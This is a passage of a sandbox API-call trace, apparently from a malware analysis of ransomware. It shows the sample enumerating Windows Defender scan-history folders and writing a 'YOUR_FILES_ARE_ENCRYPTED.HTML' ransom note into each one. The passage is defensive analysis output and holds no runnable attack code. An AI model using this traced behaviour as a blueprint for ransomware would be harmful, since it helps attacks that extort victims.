Defender\\Scans\\History\\Mput\\MputHistory\\09") returned 79 [0107.552] GetProcessHeap () returned 0x600000 [0107.552] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.553] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\09" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\09") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\09" [0107.553] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\09", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\09\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\09\\*" [0107.553] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\09\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0107.554] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="..", cAlternateFileName="")) returned 1 [0107.555] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="287", cAlternateFileName="")) returned 1 [0107.555] StrStrIW (lpFirst="287", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.555] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\09\\287") returned 83 [0107.555] PathFindExtensionW (pszPath="287") returned="" [0107.555] lstrlenW (lpString="") returned 0 [0107.555] PathFindExtensionW (pszPath="287") returned="" [0107.555] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="287", cAlternateFileName="")) returned 0 [0107.555] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0107.555] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\09\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0107.555] GetProcessHeap () returned 0x600000 [0107.555] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0107.555] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\09\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\09\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.556] WriteFile (in: hFile=0x308, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0107.557] CloseHandle (hObject=0x308) returned 1 [0107.557] GetProcessHeap () returned 0x600000 [0107.557] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0107.557] GetProcessHeap () returned 0x600000 [0107.557] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.558] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="10", cAlternateFileName="")) returned 1 [0107.558] StrStrIW (lpFirst="10", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.558] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10") returned 79 [0107.558] GetProcessHeap () returned 0x600000 [0107.558] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.559] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10" [0107.559] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10\\*" [0107.559] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0107.559] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="..", cAlternateFileName="")) returned 1 [0107.560] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="197", cAlternateFileName="")) returned 1 [0107.560] StrStrIW (lpFirst="197", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.560] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10\\197") returned 83 [0107.560] PathFindExtensionW (pszPath="197") returned="" [0107.560] lstrlenW (lpString="") returned 0 [0107.560] PathFindExtensionW (pszPath="197") returned="" [0107.560] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="267", cAlternateFileName="")) returned 1 [0107.560] StrStrIW (lpFirst="267", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.560] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10\\267") returned 83 [0107.560] PathFindExtensionW (pszPath="267") returned="" [0107.560] lstrlenW (lpString="") returned 0 [0107.560] PathFindExtensionW (pszPath="267") returned="" [0107.560] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="286", cAlternateFileName="")) returned 1 [0107.560] StrStrIW (lpFirst="286", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.560] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10\\286") returned 83 [0107.560] PathFindExtensionW (pszPath="286") returned="" [0107.560] lstrlenW (lpString="") returned 0 [0107.560] PathFindExtensionW (pszPath="286") returned="" [0107.560] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="286", cAlternateFileName="")) returned 0 [0107.560] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0107.560] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0107.560] GetProcessHeap () returned 0x600000 [0107.560] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0107.561] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\10\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\10\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.561] WriteFile (in: hFile=0x308, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0107.562] CloseHandle (hObject=0x308) returned 1 [0107.563] GetProcessHeap () returned 0x600000 [0107.563] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0107.563] GetProcessHeap () returned 0x600000 [0107.563] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.564] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="11", cAlternateFileName="")) returned 1 [0107.564] StrStrIW (lpFirst="11", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.564] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\11") returned 79 [0107.564] GetProcessHeap () returned 0x600000 [0107.564] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.565] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\11" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\11") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\11" [0107.565] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\11", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\11\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\11\\*" [0107.565] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\11\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0107.565] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="..", cAlternateFileName="")) returned 1 [0107.565] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="200", cAlternateFileName="")) returned 1 [0107.565] StrStrIW (lpFirst="200", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.565] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\11\\200") returned 83 [0107.565] PathFindExtensionW (pszPath="200") returned="" [0107.565] lstrlenW (lpString="") returned 0 [0107.565] PathFindExtensionW (pszPath="200") returned="" [0107.565] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="200", cAlternateFileName="")) returned 0 [0107.565] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0107.565] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\11\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0107.565] GetProcessHeap () returned 0x600000 [0107.565] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0107.566] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\11\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\11\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.566] WriteFile (in: hFile=0x308, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0107.567] CloseHandle (hObject=0x308) returned 1 [0107.568] GetProcessHeap () returned 0x600000 [0107.568] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0107.568] GetProcessHeap () returned 0x600000 [0107.568] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.568] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="12", cAlternateFileName="")) returned 1 [0107.568] StrStrIW (lpFirst="12", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.569] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\12") returned 79 [0107.569] GetProcessHeap () returned 0x600000 [0107.569] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.570] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\12" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\12") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\12" [0107.570] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\12", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\12\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\12\\*" [0107.570] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\12\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0107.571] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="..", cAlternateFileName="")) returned 1 [0107.571] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="194", cAlternateFileName="")) returned 1 [0107.571] StrStrIW (lpFirst="194", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.571] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\12\\194") returned 83 [0107.571] PathFindExtensionW (pszPath="194") returned="" [0107.571] lstrlenW (lpString="") returned 0 [0107.571] PathFindExtensionW (pszPath="194") returned="" [0107.571] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="194", cAlternateFileName="")) returned 0 [0107.571] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0107.571] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\12\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0107.571] GetProcessHeap () returned 0x600000 [0107.572] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0107.572] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\12\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\12\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.572] WriteFile (in: hFile=0x308, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0107.573] CloseHandle (hObject=0x308) returned 1 [0107.574] GetProcessHeap () returned 0x600000 [0107.574] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0107.574] GetProcessHeap () returned 0x600000 [0107.574] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.575] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="13", cAlternateFileName="")) returned 1 [0107.575] StrStrIW (lpFirst="13", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.575] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\13") returned 79 [0107.575] GetProcessHeap () returned 0x600000 [0107.575] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.576] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows 